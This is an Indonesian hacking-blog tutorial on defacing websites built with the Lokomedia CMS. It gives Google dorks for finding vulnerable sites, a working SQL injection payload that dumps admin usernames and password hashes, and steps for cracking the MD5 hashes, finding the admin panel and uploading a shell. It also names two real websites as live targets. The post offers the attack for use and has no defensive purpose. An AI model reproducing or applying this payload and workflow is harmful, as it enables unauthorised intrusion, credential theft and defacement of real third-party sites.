Deface Metode SQL Lokomedia + Dork Fresh


Hai kakak-kakak yang ganteng dan cantik, ketemu lagi sama gue yah.
Kali ini share tutor deface web CMS Lokomedia dengan SQL Injection.
Gas ae ke tutor w ga mau lama-lama.

Dork :
- inurl:statis-1/profil.html
- inurl:statis-2/visi-dan-misi.html 

Exploit :
'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3c6c693E,username,password)),@)--+
 
1. Dorking lah yha di google.

2. Gas Exploit! >:( misalkan gue pake dork ke 2. Jadinya site.com/statis-2/visi-dan-misi.html terus gue inject jadi site.com/statis-'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3c6c693E,username,password)),@)--+2/visi-dan-misi.html gitu jadinya, exploit taruh sebelum angka. Gak ngerti coba liat gambar.

Deface Metode SQL Lokomedia + Dork Fresh

3. Enter dan coba CTRL+U atau view-source:target, kalo muncul username sama password berarti vuln.

Deface Metode SQL Lokomedia + Dork Fresh

4. Disitu kita liat kalo Passwordnya masih dalam bentuk MD5, jadi harus kita decrypt dulu deh. Masuk ke hashkiller.co.uk > pilih MD5 buat decrypt password MD5.

5. Isi kolom yang gede dengan password MD5 tadi > isi captcha > klik submit.

Deface Metode SQL Lokomedia + Dork Fresh

6. Setelah klik submit bakal muncul hasilnya di kotak sebelah kanan.

Deface Metode SQL Lokomedia + Dork Fresh

7. Sekarang lu udah nemu username sama passwordnya. Tinggal cari admin page & login.

Deface Metode SQL Lokomedia + Dork Fresh

Deface Metode SQL Lokomedia + Dork Fresh

8. Tinggal upload shell deh ckckck :P

Admin loginnya Lokomedia biasanya di :
- /adminweb
- /panel
- /cp-admin
- /redaktur

Kalo ga ketemu bisa pake admin login finder. Butuh admin login finder? gas xmall75-ganteng.cf

live target :
- smamuhammadiyah1cilegon.sch.id
- supplierlantaivinyl.com

Karena kebanyakan site Indo yang pake CMS Lokomedia, jangan ngindex ya :) kalo mau ngindex backup/rename dulu lah

Thanks to : MichZo - -=P0IS0NERzzID=- - LCR999X - --oo0oo-- - Ryu404 - FreakzSec -./GEMBEL - Mr.L0"Ch0 - RamsNotes31 - [LuCiiFeR] - Mr.BeanCyberID_404 - EquinoX - BL4CK_SKULL_C4P-FnF16 - 0tamega// - ~R3CAPTCHA ID~ - y0sh1 - Mr.L0weRS - Aniki - InurlID - ./Fri4K_4R4nz - /.Mr_Jack154 - XS4BL9 - ~./Khoer - ./Mr.X.Z0NK.X - Xanoi - PheonixTM - MSAttacker - R1z4 - ./Mr. BA645 -./Mr.B3rUk.404 - /Mr.KodoC - Mr. X3R0X - Renym - Anzel4 - Walk3r404z
Previous
Next Post »
Thanks for your comment